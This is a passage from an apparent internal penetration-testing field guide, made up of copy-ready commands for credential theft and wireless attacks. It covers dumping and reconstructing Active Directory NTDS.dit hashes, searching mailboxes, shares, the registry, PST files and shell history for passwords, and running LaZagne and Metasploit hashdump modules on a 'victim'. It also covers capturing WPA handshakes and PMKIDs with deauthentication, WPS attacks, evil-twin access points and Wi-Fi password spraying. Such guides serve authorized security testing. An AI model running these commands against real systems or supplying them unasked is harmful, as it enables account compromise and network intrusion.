
ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Reconstruct NTDS.dit into readable hashes (2)

impacket-secretsdump -ntds ./ntds.dit -system ./SYSTEM LOCAL -outputfile customer

E XTRACT NTDS. DIT H ASHES (A UTOMATED )

Dump NTDS.dit with Crackmapexec

Internal Security Assessment: Field Guide Page 37


crackmapexec smb <target> -u admin -p Password123 -d domain --ntds drsuapi

F IND P LAINTEXT P ASSWORDS

Automate searching for credentials through email


https://github.com/dafthack/MailSniper

#Searching with non-admin privs

Invoke-SelfSearch -Mailbox [email protected]

#Searching with admin privs

Invoke-GlobalMailSearch -ImpersonationAccount notanadmin -ExchHostname exchange

Automate search through SMB and NFS Shares


https://github.com/nikallass/sharesearch

python3 sharesearch.py -p all -w -v -H hosts.lst -C creds.lst

https://github.com/SpiderLabs/scavenger

python3 scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

OR

python3 scavenger.py smb --target iplist --username administrator --password Password123 --domain
test.local --overwrite

Extract session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP
https://github.com/Arvanaghi/SessionGopher

Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -iL targets.txt -u domain.com\admin


-p Password123 –o

Search passwords in commonly-used software

Internal Security Assessment: Field Guide Page 38


https://github.com/AlessandroZ/LaZagne/releases

Drop laZagne.exe all on victim

Metasploit Post Exploitation

use post/windows/gather/smart_hashdump

use post/windows/gather/credentials/domain_hashdump

use post/windows/gather/credentials/mcafee_vse_hashdump

use post/windows/gather/credentials/mssql_local_hashdump

use post/windows/gather/hashdump

use post/windows/gather/credentials/domain_hashdump

use post/windows/gather/credentials/credential_collector

use post/windows/gather/enum_computers

use post/windows/gather/cachedump

use post/windows/gather/enum_ad_computers

use post/windows/gather/credentials/gpp

Search passwords in files and registry

findstr /si password *.txt

findstr /si password *.xml

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /spin "password" *.*

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

findstr /si password *.ini

Internal Security Assessment: Field Guide Page 39


dir /b /s sysprep.inf

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (Windows


Autologin)

Crackmapexec

crackmapexec smb -t 150 <target> -u USER -p Password123 --spider Users --depth 10 --pattern
password

Extract passwords from PST File


Non-Password protected File
https://github.com/srnsw/xena/tree/master/xena/dist/winx86

readpst.exe –D –S –o output –t ea mail.pst

findstr /s /i /m “password” *.*

Password Protected PST File


https://github.com/righettod/pst-digger

java -jar pst-digger.jar -a -f "C:\Users\xxx\my.pst" -i -k "login|password" -o TEST01

Stored Passwords in PowerShell History

cat (Get-PSReadlineOption).HistorySavePath

or

cat (Get-PSReadlineOption).HistorySavePath | sls password

or

cat (Get-PSReadlineOption).HistorySavePath | sls accountpassword

WPA PSK S TRING E XTRACTION


Windows

netsh wlan show profiles

netsh wlan show profile name=WIFI_NAME key=clear

Internal Security Assessment: Field Guide Page 40


Look for the “Key Content” line, the cleartext password will be there.

*NIX

sudo cat /etc/NetworkManager/system-connections/{SSID} | grep psk=

sudo grep psk= /etc/NetworkManager/system-connections/*

OR

sudo cat /etc/wicd/wireless-settings.conf

Internal Security Assessment: Field Guide Page 41


WIRELESS

Internal Security Assessment: Field Guide Page 42


WPA/WPA2 H ASH C APTURE WITH U SERS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) Capture Handshake (option 5)

Run manually

airmon-ng

airmon-ng start wlan0

airodump-ng wlan0mon or airodump-ng -b a wlan0mon

airodump-ng wlan0mon -c 3 -t wpa -d ff:ff:ff:ff:ff:ff -w capture

#*-c = channel *-d=BSSID

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 wlan0mon

#*-a=BSSID *-c=client

WPA/WPA2 H ASH C APTURE WITHOUT U SERS (PMKID)


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via Wifite
https://github.com/derv82/wifite2

./Wifite.py

Internal Security Assessment: Field Guide Page 43


Run manually
https://github.com/ZerBea/hcxdumptool
https://github.com/ZerBea/hcxtools

airmon-ng

airmon-ng start wlan0

airodump-ng --ivs wlan0mon

echo "BSSID">filter.txt

hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

WPS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select WPS attack menu (option 8)
4) Explore targets (option 4)
5) Run through list (7-13)

E NTERPRISE W IRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Enterprise attack menu (option 10)

Internal Security Assessment: Field Guide Page 44


4) Create company specific certificate (option 5)
5) Select Smooth mode Enterprise Evil Twin (option 6)

Password Spray
https://github.com/s0lst1c3/eaphammer

./eaphammer --eap-spray –I wlan0 –e SSID_EXAMPLE --user-list users.txt –password Summer2019

Password Reuse

If certificates are not validated, use a compromised AD username and password.

E VIL T WIN ( SOCIAL E NGINEERING )


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Evil Twin menu (option 7)
4) Select option 7-9 based on OPSEC requirement

O PEN W IRELESS
Nmap internal IP addresses and or hostnames.

WEP W IRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

Internal Security Assessment: Field Guide Page 45


./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) WEP attack (option 5)

Internal Security Assessment: Field Guide Page 46


Thank You for Your Contribution
 @Derek_Carlin
 @_dirkjan
 @byt3bl33d3r
 Rjohnsondev
 @netbiosX
 AlessandroZ
 @arvanaghi
 Nikallass
 @agsolino
 @PythonResponder
 @gentilkiwi
 @harmj0y
 @mysmartlogon
 Atom
 @xerosecurity
 @ztgrace
 Folks at SySS Research
 Contributors to Metasploit
 @bonsaiviking
 @ErrataRob
 x90skysn3k
 @DanHMcInerney
 @derv82
 @s0lst1c3

Internal Security Assessment: Field Guide Page 47

You might also like